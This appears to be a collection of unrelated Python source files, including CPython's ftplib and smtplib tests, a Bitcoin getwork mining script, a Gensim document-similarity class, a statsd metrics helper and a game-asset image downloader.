def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv23
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 20582
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
docsim.py
|
"""
Semantic document similarity using Gensim
@author: 4oh4
28/03/2020
This class is based on the Gensim Soft Cosine Tutorial notebook:
https://github.com/RaRe-Technologies/gensim/blob/develop/docs/notebooks/soft_cosine_tutorial.ipynb
"""
import logging
from re import sub
import threading
from multiprocessing import cpu_count
import numpy as np
import gensim.downloader as api
from gensim.utils import simple_preprocess
from gensim.corpora import Dictionary
from gensim.models import TfidfModel
from gensim.models import WordEmbeddingSimilarityIndex
from gensim.similarities import SparseTermSimilarityMatrix
from gensim.similarities import SoftCosineSimilarity
from gensim.models.keyedvectors import Word2VecKeyedVectors
# Import and download the most up-to-date stopwords from NLTK
# from nltk import download
# from nltk.corpus import stopwords
# download('stopwords') # Download stopwords list.
# nltk_stop_words = set(stopwords.words("english"))
# Or use a hard-coded list of English stopwords
nltk_stop_words = {'a','about','above','after','again','against','ain','all','am','an','and','any','are','aren',"aren't",'as','at','be','because','been','before','being','below','between','both','but','by','can','couldn',"couldn't",'d','did','didn',"didn't",'do','does','doesn',"doesn't",'doing','don',"don't",'down','during','each','few','for','from','further','had','hadn',"hadn't",'has','hasn',"hasn't",'have','haven',"haven't",'having','he','her','here','hers','herself','him','himself','his','how','i','if','in','into','is','isn',"isn't",'it',"it's",'its','itself','just','ll','m','ma','me','mightn',"mightn't",'more','most','mustn',"mustn't",'my','myself','needn',"needn't",'no','nor','not','now','o','of','off','on','once','only','or','other','our','ours','ourselves','out','over','own','re','s','same','shan',"shan't",'she',"she's",'should',"should've",'shouldn',"shouldn't",'so','some','such','t','than','that',"that'll",'the','their','theirs','them','themselves','then','there','these','they','this','those','through','to','too','under','until','up','ve','very','was','wasn',"wasn't",'we','were','weren',"weren't",'what','when','where','which','while','who','whom','why','will','with','won',"won't",'wouldn',"wouldn't",'y','you',"you'd","you'll","you're","you've",'your','yours','yourself','yourselves'}
class NotReadyError(Exception):
pass
class DocSim:
"""
Find documents that are similar to a query string.
Calculated using word similarity (Soft Cosine Similarity) of word embedding vectors
Example usage:
# Use default model (glove-wiki-gigaword-50)
docsim = DocSim()
docsim.similarity_query(query_string, documents)
# Or, specify a preferred, pre-existing Gensim model with custom stopwords and verbose mode
docsim = DocSim(model='glove-twitter-25', stopwords=['the', 'and', 'are'], verbose=True)
docsim.similarity_query(query_string, documents)
# Or, supply a custom pre-initialised model in gensim.models.keyedvectors.Word2VecKeyedVectors format
docsim = DocSim(model=myModel)
docsim.similarity_query(query_string, documents)
"""
default_model = "glove-wiki-gigaword-50"
model_ready = False # Only really relevant to threaded sub-class
def __init__(self, model=None, stopwords=None, verbose=False):
# Constructor
self.verbose = verbose
self.setup_model(model)
if stopwords is None:
self.stopwords = nltk_stop_words
else:
self.stopwords = stopwords
def setup_model(self, model):
# Determine which model to use, download/load it, and create the similarity_index
if isinstance(model, Word2VecKeyedVectors):
# Use supplied model
self.model = model
elif isinstance(model, str):
# Try to download named model
if self.verbose:
print(f'Loading word vector model: {model}')
self.model = api.load(model)
if self.verbose:
print('Model loaded')
elif model is None:
# Download/use default GloVe model
if self.verbose:
print(f'Loading default GloVe word vector model: {self.default_model}')
self.model = api.load(self.default_model)
if self.verbose:
print('Model loaded')
else:
raise ValueError('Unable to load word vector model')
self.similarity_index = WordEmbeddingSimilarityIndex(self.model)
self.model_ready = True
def preprocess(self, doc: str):
# Clean up input document string, remove stopwords, and tokenize
doc = sub(r'<img[^<>]+(>|$)', " image_token ", doc)
doc = sub(r'<[^<>]+(>|$)', " ", doc)
doc = sub(r'\[img_assist[^]]*?\]', " ", doc)
doc = sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', " url_token ", doc)
return [token for token in simple_preprocess(doc, min_len=0, max_len=float("inf")) if token not in self.stopwords]
def _softcossim(self, query: str, documents: list):
# Compute Soft Cosine Measure between the query and each of the documents.
query = self.tfidf[self.dictionary.doc2bow(query)]
index = SoftCosineSimilarity(
self.tfidf[[self.dictionary.doc2bow(document) for document in documents]],
self.similarity_matrix)
similarities = index[query]
return similarities
def similarity_query(self, query_string: str, documents: list):
"""
Run a new similarity ranking, for query_string against each of the documents
Arguments:
query_string: (string)
documents: (list) of string documents to compare query_string against
explain: (bbol) if True, highest scoring words are also returned
Returns:
list: similarity scores for each of the documents
or
NotReadyError: if model is not ready/available
"""
if self.model_ready:
corpus = [self.preprocess(document) for document in documents]
query = self.preprocess(query_string)
if set(query) == set([word for document in corpus for word in document]):
raise ValueError('query_string full overlaps content of document corpus')
if self.verbose:
print(f'{len(corpus)} documents loaded into corpus')
self.dictionary = Dictionary(corpus+[query])
self.tfidf = TfidfModel(dictionary=self.dictionary)
self.similarity_matrix = SparseTermSimilarityMatrix(self.similarity_index,
self.dictionary, self.tfidf)
scores = self._softcossim(query, corpus)
return scores.tolist()
else:
raise NotReadyError('Word embedding model is not ready.')
class DocSim_threaded(DocSim):
"""
Threaded verion to load model (long running process) in background. Everything else same as standard version.
Find documents that are similar to a query string.
Calculated using word similarity (Soft Cosine Similarity) of word embedding vectors
Example usage:
docsim = DocSim_threaded()
docsim.similarity_query(query_string, documents)
"""
def __init__(self, model=None, stopwords=None, verbose=False):
# Constructor
self.verbose = verbose
self._threaded_load(model)
if stopwords is None:
self.stopwords = nltk_stop_words
def _threaded_load(self, model):
"""
# Setup the model in a separate thread
"""
self.thread = threading.Thread(target=self.setup_model, args=[model])
self.thread.setDaemon(True)
self.thread.start()
|
metrics.py
|
import logging
import sys
import functools
import threading
import statsd
LOG = logging.getLogger(__name__)
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class Metrics():
def __init__(self, host, port):
self._port = port
self.statsd = statsd.StatsClient(host, port)
@threaded
def counter(self, incoming, tag):
method = incoming.message.get('method')
stat = "{}.{}".format(tag, method)
self.statsd.incr(stat)
|
pyGBFexchara.py
|
# 批量下载GBF剧情任务编外半身立绘
from queue import Queue
import os
import time
import threading
import urllib.request
import urllib.error
import datetime
import sys
sys.path.append(".")
import pyDownload as download
dirname = os.getcwd()
print_lock = threading.Lock()
data_q = Queue()
SAVELINK = False
DEBUG = False
prefix1 = "http://game-a.granbluefantasy.jp/assets/img/sp/quest/scene/character/body/"
groupstr = ["3040070000_unarmed",
"3040070000_unarmed2",
"3040070000_cockpit",
"3040028000_cockpit"]
explist = ["","_angry","_cutin","_eye",
"_joy","_laugh3","_laugh2","_laugh",
"_mood","_mortifying","_surprise_fe","_sad",
"_suddenly","_serious","_surprise","_shy",
"_think","_weak","_01","_02","_03"]
# chara[R/SR/SSR/skin] quest[r/sr/ssr/extra] summon[n/r/sr/ssr] zoom[r/sr/ssr/skin] mypage[r/sr/ssr/skin] class cover
groupdir = ["img\\quest\\exorder"]
grouplink = ["link\\quest-exo.txt"]
MaxThread = 40
def mkdir(path):
tmppath = os.getcwd()+"\\"+path
try:
os.makedirs(tmppath)
except:
pass
return tmppath
def saveIndex(imgData):
time.sleep(0.1)
with print_lock:
for iexp in explist:
dir = groupdir[0]
count = 0
try:
url = prefix1 + imgData +iexp+ ".png"
if(download.saveImg(url,dir)):
count+=1
if(SAVELINK):
#print(grouplink[imgData.groupid])
#print(imgData.url)
with open(grouplink[0],"a") as linkfile:
linkfile.write(url+"\n")
except:
pass
def worker():
while True:
imgData1 = data_q.get()
#print(imgData1)
saveIndex(imgData1)
data_q.task_done()
def main():
#socket.setdefaulttimeout(10)
if(sys.version_info.major != 3):
print("This script only works for python3")
return
try:
logdata = ""
with open("img\\exo-log.txt") as logfile:
lines = logfile.readlines()
# if(len(lines) == len(groupstr)):
# print("Already the latest!")
# return
# elif(len(groupdir)>len(lines)):
# lastpoint = len(lines)
except:
pass
for x in range(MaxThread):
t = threading.Thread(target = worker)
t.daemon = True
t.start()
for idir in groupdir:
mkdir(idir)
mkdir("link")
start = time.time()
simglist = []
# init
for istr in groupstr:
data_q.put(istr)
data_q.join()
print("entire job took:", time.time()-start)
# today = str(datetime.date.today())
with open("img\\exo-log.txt", "w", encoding='utf-8') as logfile:
for ilog in groupstr:
istr = str(ilog)+","
logfile.write(istr)
logfile.write("\n")
if __name__ == '__main__':
main()
os.system("pause")
#appendix
#weapon
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/weapon/m/1040001600.jpg
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/b/1040001600.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/weapon/ls/1040500300.jpg
#image set
#character origin zoom
#skin
#3710001000
# http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/zoom/3040010000_01.png
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/npc/b/3030007000_01.png
#class
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/job_change/120001_wa_1_01.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/cjs/job_release_180001_1_c.png
#quest character 2 3 4 99
#http://game-a1.granbluefantasy.jp/assets/img/sp/quest/scene/character/body/3040022000.png
#summon 1 2 3 4
#http://game-a.granbluefantasy.jp/assets/img/sp/assets/summon/b/2030011000.png
#mypage class&sr
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/my/3040058000_02.png
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/leader/my/140201_kn_1_01.png
#not used
#http://game-a1.granbluefantasy.jp/assets/img/sp/assets/npc/npc_evolution/main/3040071000_02.png
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST
from test.support import threading_setup, threading_cleanup, join_thread
from test.support import requires_hashdigest
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
